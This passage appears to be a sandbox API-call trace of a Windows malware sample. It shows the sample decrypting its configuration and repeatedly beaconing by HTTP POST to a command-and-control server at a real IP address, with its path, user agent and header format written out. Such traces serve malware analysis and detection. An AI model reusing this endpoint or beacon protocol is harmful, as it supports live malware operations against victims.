Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0278.716] GetProcessHeap () returned 0x690000 [0278.716] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0278.716] GetProcessHeap () returned 0x690000 [0278.716] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0278.716] GetProcessHeap () returned 0x690000 [0278.716] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0278.716] GetProcessHeap () returned 0x690000 [0278.716] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0278.719] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0278.721] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0278.721] GetProcessHeap () returned 0x690000 [0278.721] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0278.721] GetProcessHeap () returned 0x690000 [0278.721] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0278.721] send (s=0x89c, buf=0x6ad508*, len=242, flags=0) returned 242 [0278.722] send (s=0x89c, buf=0x6aba40*, len=159, flags=0) returned 159 [0278.723] GetProcessHeap () returned 0x690000 [0278.723] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0278.723] recv (in: s=0x89c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0278.804] GetProcessHeap () returned 0x690000 [0278.804] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0278.804] GetProcessHeap () returned 0x690000 [0278.805] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0278.808] GetProcessHeap () returned 0x690000 [0278.808] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0278.808] GetProcessHeap () returned 0x690000 [0278.809] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0278.809] closesocket (s=0x89c) returned 0 [0278.809] GetProcessHeap () returned 0x690000 [0278.809] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0278.809] GetProcessHeap () returned 0x690000 [0278.810] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0278.810] GetProcessHeap () returned 0x690000 [0278.810] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0278.810] GetProcessHeap () returned 0x690000 [0278.811] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0278.811] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x165c) returned 0x89c [0278.812] Sleep (dwMilliseconds=0xea60) [0278.814] GetProcessHeap () returned 0x690000 [0278.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0278.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.815] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0278.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.822] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0278.832] GetProcessHeap () returned 0x690000 [0278.832] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0278.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.833] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0278.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.834] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0278.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.834] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.834] GetProcessHeap () returned 0x690000 [0278.835] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0278.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.836] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0278.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.839] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0278.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.839] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0278.840] GetProcessHeap () returned 0x690000 [0278.840] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0278.840] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.840] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0278.841] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.841] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0278.842] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.842] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0278.843] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.843] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0278.843] GetProcessHeap () returned 0x690000 [0278.843] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0278.843] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0278.843] GetProcessHeap () returned 0x690000 [0278.844] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0278.844] GetProcessHeap () returned 0x690000 [0278.844] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0278.844] GetProcessHeap () returned 0x690000 [0278.844] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0278.844] GetProcessHeap () returned 0x690000 [0278.844] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0278.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.848] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0278.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.859] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0278.865] GetProcessHeap () returned 0x690000 [0278.865] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0278.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.866] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0278.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.867] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0278.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.868] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.868] GetProcessHeap () returned 0x690000 [0278.869] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0278.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.870] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0278.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.872] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0278.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.873] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0278.873] GetProcessHeap () returned 0x690000 [0278.873] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0278.874] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.874] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0278.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.875] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0278.876] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.876] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0278.877] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.878] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0278.878] GetProcessHeap () returned 0x690000 [0278.878] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0278.878] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0278.878] GetProcessHeap () returned 0x690000 [0278.878] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0278.878] socket (af=2, type=1, protocol=6) returned 0x8a0 [0278.878] connect (s=0x8a0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0278.902] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0278.902] GetProcessHeap () returned 0x690000 [0278.902] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0278.902] GetProcessHeap () returned 0x690000 [0278.902] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0278.902] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0278.903] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0278.903] GetProcessHeap () returned 0x690000 [0278.903] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0100 [0278.903] GetProcessHeap () returned 0x690000 [0278.904] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0278.909] GetProcessHeap () returned 0x690000 [0278.909] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0278.909] GetProcessHeap () returned 0x690000 [0278.909] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0278.909] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0278.910] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0278.910] GetProcessHeap () returned 0x690000 [0278.910] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0278.910] GetProcessHeap () returned 0x690000 [0278.910] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0278.911] send (s=0x8a0, buf=0x6ad508*, len=242, flags=0) returned 242 [0278.911] send (s=0x8a0, buf=0x6aba40*, len=159, flags=0) returned 159 [0278.912] GetProcessHeap () returned 0x690000 [0278.912] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0278.912] recv (in: s=0x8a0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0278.983] GetProcessHeap () returned 0x690000 [0278.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0278.984] GetProcessHeap () returned 0x690000 [0278.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0278.984] GetProcessHeap () returned 0x690000 [0278.985] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0100 | out: hHeap=0x690000) returned 1 [0278.985] GetProcessHeap () returned 0x690000 [0278.985] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0278.985] closesocket (s=0x8a0) returned 0 [0278.985] GetProcessHeap () returned 0x690000 [0278.985] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0278.985] GetProcessHeap () returned 0x690000 [0278.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0278.986] GetProcessHeap () returned 0x690000 [0278.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0278.986] GetProcessHeap () returned 0x690000 [0278.987] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0278.987] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1660) returned 0x8a0 [0279.000] Sleep (dwMilliseconds=0xea60) [0279.002] GetProcessHeap () returned 0x690000 [0279.002] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0279.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.003] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0279.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.011] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0279.018] GetProcessHeap () returned 0x690000 [0279.018] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0279.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.019] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0279.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.024] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0279.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.025] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0279.025] GetProcessHeap () returned 0x690000 [0279.026] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0279.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.026] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0279.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.027] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0279.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.028] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0279.028] GetProcessHeap () returned 0x690000 [0279.028] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0279.029] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0279.029] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0279.030] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0279.030] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0279.033] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0279.033] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0279.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0279.034] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0279.034] GetProcessHeap () returned 0x690000 [0279.034] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0279.034] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0279.034] GetProcessHeap () returned 0x690000 [0279.035] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0279.035] GetProcessHeap () returned 0x690000 [0279.035] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0279.035] GetProcessHeap () returned 0x690000 [0279.035] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0279.035] GetProcessHeap () returned 0x690000 [0279.035] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0279.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.036] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0279.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.041] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0279.047] GetProcessHeap () returned 0x690000 [0279.047] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0279.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.048] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0279.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.049] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0279.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.050] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0279.050] GetProcessHeap () returned 0x690000 [0279.050] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0279.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.051] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0279.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.053] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0279.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.055] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0279.055] GetProcessHeap () returned 0x690000 [0279.055] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0279.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0279.056] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0279.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0279.057] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0279.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0279.058] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0279.058] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0279.059] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0279.059] GetProcessHeap () returned 0x690000 [0279.059] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0279.059] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0279.059] GetProcessHeap () returned 0x690000 [0279.059] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0279.059] socket (af=2, type=1, protocol=6) returned 0x8a4 [0279.059] connect (s=0x8a4, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0279.091] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0279.092] GetProcessHeap () returned 0x690000 [0279.092] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0279.092] GetProcessHeap () returned 0x690000 [0279.092] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0279.092] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0279.093] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0279.093] GetProcessHeap () returned 0x690000 [0279.093] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6aff80 [0279.093] GetProcessHeap () returned 0x690000 [0279.094] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0279.094] GetProcessHeap () returned 0x690000 [0279.094] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0279.094] GetProcessHeap () returned 0x690000 [0279.094] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0279.095] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0279.095] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0279.095] GetProcessHeap () returned 0x690000 [0279.095] RtlAllocateHeap 